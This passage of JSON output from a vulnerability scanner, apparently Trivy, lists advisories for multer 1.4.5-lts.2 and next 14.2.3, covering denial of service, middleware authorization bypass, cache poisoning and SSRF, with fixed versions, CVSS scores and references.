"V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-2359", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab", "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc", "https://nvd.nist.gov/vuln/detail/CVE-2026-2359", "https://www.cve.org/CVERecord?id=CVE-2026-2359" ], "PublishedDate": "2026-02-27T16:16:25.467Z", "LastModifiedDate": "2026-03-19T17:28:16.05Z" }, { "VulnerabilityID": "CVE-2026-3304", "VendorIDs": [ "GHSA-xf7r-hgr6-v32p" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3304", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8142a44799d7b3caedd0a6532c969e6ce4f9a440c48730c9de806f51644e8b5f", "Title": "multer: Multer: Denial of Service via malformed requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-459" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3304", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee", "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p", "https://nvd.nist.gov/vuln/detail/CVE-2026-3304", "https://www.cve.org/CVERecord?id=CVE-2026-3304" ], "PublishedDate": "2026-02-27T16:16:26.38Z", "LastModifiedDate": "2026-03-19T17:28:33.81Z" }, { "VulnerabilityID": "CVE-2026-3520", "VendorIDs": [ "GHSA-5528-5vmv-3xc2" ], "PkgID": "multer@1.4.5-lts.2", "PkgName": "multer", "PkgIdentifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "InstalledVersion": "1.4.5-lts.2", "FixedVersion": "2.1.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3520", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e4392427baa2067ccb3d8cbf52efe874ab7cd4ae411fba46829337513dac80a1", "Title": "multer: Multer: Denial of Service via malformed requests", "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", "Severity": "HIGH", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3520", "https://cna.openjsf.org/security-advisories.html", "https://github.com/expressjs/multer", "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752", "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2", "https://nvd.nist.gov/vuln/detail/CVE-2026-3520", "https://www.cve.org/CVERecord?id=CVE-2026-3520" ], "PublishedDate": "2026-03-04T17:16:22.61Z", "LastModifiedDate": "2026-03-09T18:03:23.1Z" }, { "VulnerabilityID": "CVE-2025-29927", "VendorIDs": [ "GHSA-f82v-jwr5-mffw" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.9, 14.2.25, 15.2.3, 12.3.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-29927", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e0d3a12ad946b68513e8381a8b3cf3385823f959ea2b1bb4b6f6af5c4c5a6860", "Title": "nextjs: Authorization Bypass in Next.js Middleware", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.", "Severity": "CRITICAL", "CweIDs": [ "CWE-285", "CWE-863" ], "VendorSeverity": { "ghsa": 4, "redhat": 4 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "V3Score": 9.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "V3Score": 9.1 } }, "References": [ "http://www.openwall.com/lists/oss-security/2025/03/23/3", "http://www.openwall.com/lists/oss-security/2025/03/23/4", "https://access.redhat.com/security/cve/CVE-2025-29927", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2", "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48", "https://github.com/vercel/next.js/releases/tag/v12.3.5", "https://github.com/vercel/next.js/releases/tag/v13.5.9", "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw", "https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/", "https://nvd.nist.gov/vuln/detail/CVE-2025-29927", "https://security.netapp.com/advisory/ntap-20250328-0002", "https://security.netapp.com/advisory/ntap-20250328-0002/", "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware", "https://www.cve.org/CVERecord?id=CVE-2025-29927" ], "PublishedDate": "2025-03-21T15:15:42.66Z", "LastModifiedDate": "2025-09-10T15:49:40.637Z" }, { "VulnerabilityID": "CVE-2024-46982", "VendorIDs": [ "GHSA-gp8f-8m3g-qvj9" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.7, 14.2.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-46982", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:a3fe7f4be3b441e26cb269cd28bdf060df2638ed844bff41f937bab4a425fc71", "Title": "Next.js Cache Poisoning", "Description": "Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, \u0026 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.", "Severity": "HIGH", "CweIDs": [ "CWE-639" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V3Score": 7.5, "V40Score": 8.7 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3", "https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda", "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9", "https://nvd.nist.gov/vuln/detail/CVE-2024-46982" ], "PublishedDate": "2024-09-17T22:15:02.273Z", "LastModifiedDate": "2025-09-10T15:46:05.173Z" }, { "VulnerabilityID": "CVE-2024-51479", "VendorIDs": [ "GHSA-7gfc-8cq8-jh5f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.15", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-51479", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:67a1d5a6113081fdbf64538132490117ce08151004c9fa548af96529edccd239", "Title": "next.js: next: authorization bypass in Next.js", "Description": "Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.", "Severity": "HIGH", "CweIDs": [ "CWE-285", "CWE-863" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-51479", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b", "https://github.com/vercel/next.js/releases/tag/v14.2.15", "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f", "https://nvd.nist.gov/vuln/detail/CVE-2024-51479", "https://www.cve.org/CVERecord?id=CVE-2024-51479" ], "PublishedDate": "2024-12-17T19:15:06.697Z", "LastModifiedDate": "2025-09-10T15:48:08.253Z" }, { "VulnerabilityID": "CVE-2026-44573", "VendorIDs": [ "GHSA-36qx-fr4f-26g5" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44573", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c4d4a21761915329d3385f43cb5037f6ce4372f37b846fd1b3eb01e7bef86153", "Title": "next.js: Next.js: Information disclosure due to middleware bypass in Pages Router with i18n", "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data/\u003cbuildId\u003e/\u003cpage\u003e.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "HIGH", "CweIDs": [ "CWE-863" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44573", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5", "https://nvd.nist.gov/vuln/detail/CVE-2026-44573", "https://www.cve.org/CVERecord?id=CVE-2026-44573" ], "PublishedDate": "2026-05-13T17:16:22.627Z", "LastModifiedDate": "2026-05-14T12:24:22.91Z" }, { "VulnerabilityID": "CVE-2026-44578", "VendorIDs": [ "GHSA-c4j6-fc7j-m34r" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44578", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2f606807f42a8267149f65df0aef6b7464ace74663a38e513d27579500c212ed", "Title": "Next.js: Next.js: Server-Side Request Forgery via crafted WebSocket upgrade requests", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "HIGH", "CweIDs": [ "CWE-918" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "V3Score": 8.6 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "V3Score": 8.6 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44578", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r", "https://nvd.nist.gov/vuln/detail/CVE-2026-44578", "https://www.cve.org/CVERecord?id=CVE-2026-44578" ], "PublishedDate": "2026-05-13T18:16:17.99Z", "LastModifiedDate": "2026-05-14T18:34:38.53Z" }, { "VulnerabilityID": "GHSA-5j59-xgg2-r9c4", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60, 16.0.10, 16.1.0-canary.19", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-5j59-xgg2-r9c4", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:beb8c5b18b8d810ae8c1ef88991b0eb88db27b64ac56f0bbb63856fa4223981f", "Title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up", "Description": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4", "https://nextjs.org/blog/security-update-2025-12-11", "https://nvd.nist.gov/vuln/detail/CVE-2025-67779", "https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components", "https://www.cve.org/CVERecord?id=CVE-2025-55184", "https://www.facebook.com/security/advisories/cve-2025-67779" ], "PublishedDate": "2025-12-12T17:21:57Z", "LastModifiedDate": "2026-01-15T21:55:04Z" }, { "VulnerabilityID": "GHSA-8h8q-6873-q5fj", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-8h8q-6873-q5fj", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c5ece5048dd1c49b106acdcd876fe224249fd21b8dff2ad18f9e2674e83c8ccf", "Title": "Next.js Vulnerable to Denial of Service with Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). \n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj", "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx", "https://nvd.nist.gov/vuln/detail/CVE-2026-23870" ], "PublishedDate": "2026-05-11T14:50:27Z", "LastModifiedDate": "2026-05-11T14:50:27Z" }, { "VulnerabilityID": "GHSA-h25m-26qc-wcjf", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, 16.0.11, 16.1.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-h25m-26qc-wcjf", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d1225986efad9bdc7def940c835aa68ee1f9f7838e4c8aa6e64f3fb618e9efc8", "Title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf", "https://nvd.nist.gov/vuln/detail/CVE-2026-23864", "https://vercel.com/changelog/summary-of-cve-2026-23864" ], "PublishedDate": "2026-01-28T15:38:01Z", "LastModifiedDate": "2026-01-28T15:38:01Z" }, { "VulnerabilityID": "GHSA-mwv6-3258-q52c", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59, 16.0.9, 16.1.0-canary.17", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-mwv6-3258-q52c", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5be7bde491a235b3c38c6ea2faa1c428c6dcd6b5676f61b3e3dab9ab9788b9dc", "Title": "Next Vulnerable to Denial of Service with Server Components", "Description": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c", "https://nextjs.org/blog/security-update-2025-12-11", "https://www.cve.org/CVERecord?id=CVE-2025-55184" ], "PublishedDate": "2025-12-11T22:49:27Z", "LastModifiedDate": "2025-12-11T22:49:28Z" }, { "VulnerabilityID": "GHSA-q4gf-8mx6-v5v3", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.15, 16.2.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-q4gf-8mx6-v5v3", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d1e347c726eb2dece45bab319ec21befe80faee4946a5643861308f27a38e787", "Title": "Next.js has a Denial of Service with Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3", "https://vercel.com/changelog/summary-of-cve-2026-23869" ], "PublishedDate": "2026-04-10T15:35:47Z", "LastModifiedDate": "2026-04-10T15:35:47Z" }, { "VulnerabilityID": "CVE-2024-47831", "VendorIDs": [ "GHSA-g77x-44xx-532m" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-47831", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5eb64b8253cd9ef722055fd82f345f6a6e65659b753dedbe05012ded5becf9a1", "Title": "next.js: Next.js image optimization has Denial of Service condition", "Description": "Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U", "V3Score": 5.9, "V40Score": 4.6 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-47831", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a", "https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m", "https://nvd.nist.gov/vuln/detail/CVE-2024-47831", "https://www.cve.org/CVERecord?id=CVE-2024-47831" ], "PublishedDate": "2024-10-14T18:15:05.013Z", "LastModifiedDate": "2024-11-08T15:39:21.823Z" }, { "VulnerabilityID": "CVE-2024-56332", "VendorIDs": [ "GHSA-7m27-7ghc-44w9" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.8, 14.2.21, 15.1.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-56332", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2716a32b516e3f78cb5b5a57b573383dfb5c29c51a12180b66fcd14415c4f363", "Title": "next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has 